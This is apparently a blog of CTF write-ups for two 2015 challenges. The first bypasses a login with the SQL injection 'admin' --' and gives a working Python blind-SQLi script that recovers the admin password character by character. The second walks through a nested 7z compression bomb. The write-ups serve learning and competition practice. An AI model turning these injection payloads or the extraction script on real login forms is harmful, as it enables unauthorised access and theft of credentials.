MMA CTF 2015 - Login as admin! (30)

On this challenge I took an approach that was probably over-engineered. Used Blind SQLi to find the password of the admin user.


You can login with 'test/test' credentials, which gives you this output:

You are test user.
logout

Let's try logging in with the admin' user.

Initially tried a simple sql injection and it worked immediately:

Username: admin' --

This output was provided, saying we needed to go further by finding the password for the user:

Congratulations!!
You are admin user.
The flag is your password!
logout

This worked without setting the password field, so this makes things easy. Didn't want to attempt dumping the password or joining with the username. So instead went the Blind SQLi route. First tried the initial effort by running:

admin' and password like '%' --
> Success!
admin' and password like 'MMA{%' --
> Success!
admin' and password like 'abcd%' --
> Expected Failure.

Now that we have that out of the way, let's write a python client!

import sys
import requests
import random
import string

url = "http://arrive.chal.mmactf.link/login.cgi"
injection = "admin' and password like '{}' --"

allChars = string.lowercase

solution = "MMA{"

def found(c):
  print "Found! :: {}".format(c)
  print solution

while len(solution) < 80:
  for c in allChars:
    print 'Attempt: {}'.format(c)
    content = requests.post(url, {
      "username": injection.format(solution + c + "%")
    }).content
    if 'invalid' not in content:
      solution += c
      found(c)
      break
    elif c == 'z':
      solution += '_'
      found(c)

After a few cycles, this prints out:

  MMA{cats_alice_band}

ASIS CTF 2015 - Keka Bomb (75)

Keka Bomb was a forensics challenge with a simple description: "Find the flag in this file." When pulling down the file it was like all others in ASIS' CTF, unxz, then check the filetype.

$ file keka
keka: 7-zip archive data, version 0.3

Let's try extracting it! :D

7z e keka
# .....Takes long Time...
# No.

It ended up throwing up a few large files and that's when I started doing it the way it was probably intended to be solved, like most zip/compression bomb challenges.

- List the compressed files in the archive
- Extract the differing file which may lead to the target

Here's the final solution I ended up going with:

$ 7z l keka
7-Zip [64] 9.20  Copyright (c) 1999-2010 Igor Pavlov  2010-11-18
p7zip Version 9.20 (locale=utf8,Utf16=on,HugeFiles=on,4 CPUs)

Listing archive: keka

--
Path = keka
Type = 7z
Method = LZMA
Solid = -
Blocks = 16
Physical Size = 9508910
Headers Size = 210

   Date      Time    Attr         Size   Compressed  Name
------------------- ----- ------------ ------------  ------------------------
2015-04-29 18:46:35 ....A   4194304000       594004  001.7z
2015-04-29 18:46:35 ....A   4194304000       594004  002.7z
2015-04-29 18:46:35 ....A   4194304000       594004  003.7z
2015-04-29 18:46:35 ....A   4194304000       594004  004.7z
2015-04-29 18:46:35 ....A   4194304000       594004  005.7z
2015-04-29 18:46:35 ....A   4194304000       594004  006.7z
2015-04-29 18:46:35 ....A   4194304000       594004  007.7z
2015-04-29 18:46:35 ....A   4194304000       594004  008.7z
2015-04-29 18:46:35 ....A   4194304000       594004  009.7z
2015-04-29 18:46:35 ....A   4194304000       594004  010.7z
2015-04-29 18:46:35 ....A   4194304000       594004  011.7z
2015-04-29 18:46:35 ....A   4194304000       594004  012.7z
2015-04-29 18:46:35 ....A   4194304000       598640  013.7z
2015-04-29 18:46:35 ....A   4194304000       594004  014.7z
2015-04-29 18:46:35 ....A   4194304000       594004  015.7z
2015-04-29 18:46:35 ....A   4194304000       594004  016.7z
------------------- ----- ------------ ------------  ------------------------
                           67108864000      9508700  16 files, 0 folders

Looks like this file differs:

2015-04-29 18:46:35 ....A   4194304000       598640  013.7z

Continuing by extracting only that one:

$ 7z e keka 013.7z
7-Zip [64] 9.20  Copyright (c) 1999-2010 Igor Pavlov  2010-11-18
p7zip Version 9.20 (locale=utf8,Utf16=on,HugeFiles=on,4 CPUs)

Processing archive: keka

Extracting  013.7z

Everything is Ok

Size:       4194304000
Compressed: 9508910

And for fun, let's watch our hard=drive fill up as we cry:

watch 'ls -lahlahlahlah'

Cool, extracted a 3.9GB 7z file:

$ 7z l 013.7z
7-Zip [64] 9.20  Copyright (c) 1999-2010 Igor Pavlov  2010-11-18
p7zip Version 9.20 (locale=utf8,Utf16=on,HugeFiles=on,4 CPUs)

Listing archive: 013.7z

--
Path = 013.7z
Type = 7z
Method = LZMA
Solid = -
Blocks = 16
Physical Size = 9497888
Headers Size = 209

   Date      Time    Attr         Size   Compressed  Name
------------------- ----- ------------ ------------  ------------------------
2015-04-29 11:32:54 ....A   4194304000       593444  0001.7z
2015-04-29 11:32:54 ....A   4194304000       593444  0002.7z
2015-04-29 11:32:54 ....A   4194304000       593444  0003.7z
2015-04-29 11:32:54 ....A   4194304000       593444  0004.7z
2015-04-29 11:32:54 ....A   4194304000       593444  0005.7z
2015-04-29 11:32:54 ....A   4194304000       593444  0006.7z
2015-04-29 11:32:54 ....A   4194304000       593444  0007.7z
2015-04-29 11:32:54 ....A   4194304000       593444  0008.7z
2015-04-29 11:32:54 ....A   4194304000       596019  0009.7z
2015-04-29 11:32:54 ....A   4194304000       593444  0010.7z
2015-04-29 11:32:54 ....A   4194304000       593444  0011.7z
2015-04-29 11:32:54 ....A   4194304000       593444  0012.7z
2015-04-29 11:32:54 ....A   4194304000       593444  0013.7z
2015-04-29 11:32:54 ....A   4194304000       593444  0014.7z
2015-04-29 11:32:54 ....A   4194304000       593444  0015.7z
2015-04-29 11:32:54 ....A   4194304000       593444  0016.7z
------------------- ----- ------------ ------------  ------------------------
                           67108864000      9497679  16 files, 0 folders
------------------------------------------------------------

Rinse, and Repeat!

NOTE: Rinsing in this case is defined as deleting left-over 3.9GB files.... don't want too many of those stacking up....

Differs:

2015-04-29 11:32:54 ....A   4194304000       596019  0009.7z

Extract:

$ 7z e 013.7z 0009.7z

Delete:

$ rm 013.7z

$ 7z l 0009.7z
...
2015-04-29 06:33:53 ....A   4194304000       593928  0000007.7z
...
7z e 0009.7z 0000007.7z

$ 7z l 0000007.7z
...
2015-04-29 01:07:48 ....A   4194304000       592391  0000000008.7z
...
7z e 0000007.7z 0000000008.7z

Finally something more interesting! (Was almost ready to write a script)

Listing archive: 0000000008.7z

--
Path = 0000000008.7z
Type = 7z
Method = LZMA
Solid = -
Blocks = 16
Physical Size = 9467826
Headers Size = 212

   Date      Time    Attr         Size   Compressed  Name
------------------- ----- ------------ ------------  ------------------------
2015-04-27 00:20:03 ....A   4194304000       591723  bomb_00
2015-04-27 00:20:03 ....A   4194304000       591723  bomb_01
2015-04-27 00:20:03 ....A   4194304000       591723  bomb_02
2015-04-27 00:20:03 ....A   4194304000       591723  bomb_03
2015-04-27 00:20:03 ....A   4194304000       591723  bomb_04
2015-04-27 00:20:03 ....A   4194304000       591723  bomb_05
2015-04-27 00:20:03 ....A   4194304000       591723  bomb_06
2015-04-27 00:20:03 ....A   4194304000       591723  bomb_07
2015-04-27 00:20:03 ....A   4194304000       591769  bomb_08
2015-04-27 00:20:03 ....A   4194304000       591723  bomb_09
2015-04-27 00:20:03 ....A   4194304000       591723  bomb_10
2015-04-27 00:20:03 ....A   4194304000       591723  bomb_11
2015-04-27 00:20:03 ....A   4194304000       591723  bomb_12
2015-04-27 00:20:03 ....A   4194304000       591723  bomb_13
2015-04-27 00:20:03 ....A   4194304000       591723  bomb_14
2015-04-27 00:20:03 ....A   4194304000       591723  bomb_15
------------------- ----- ------------ ------------  ------------------------
                           67108864000      9467614  16 files, 0 folders
------------------------------------------------------------

Looks like we have the final bomb! Let's extract it!

2015-04-27 00:20:03 ....A   4194304000       591769  bomb_08
...
$ 7z e 0000000008.7z bomb_08

Then after it's extracted, check the filetype again:

$ file bomb_08
bomb_08: data

Sweeeeet! We got some data! Let's strings it see what comes up:

$ strings bomb_08
ASIS{f974da3203d155826974f4a66735a20b}

Bomb Defused!


So in retrospect, this was a pretty fun challenge, easy enough to do on the command-line without anything more than standard tools and 7zip. I could've written a script, but it wasn't too deep, and was fun to do some hunting in the 7z realm.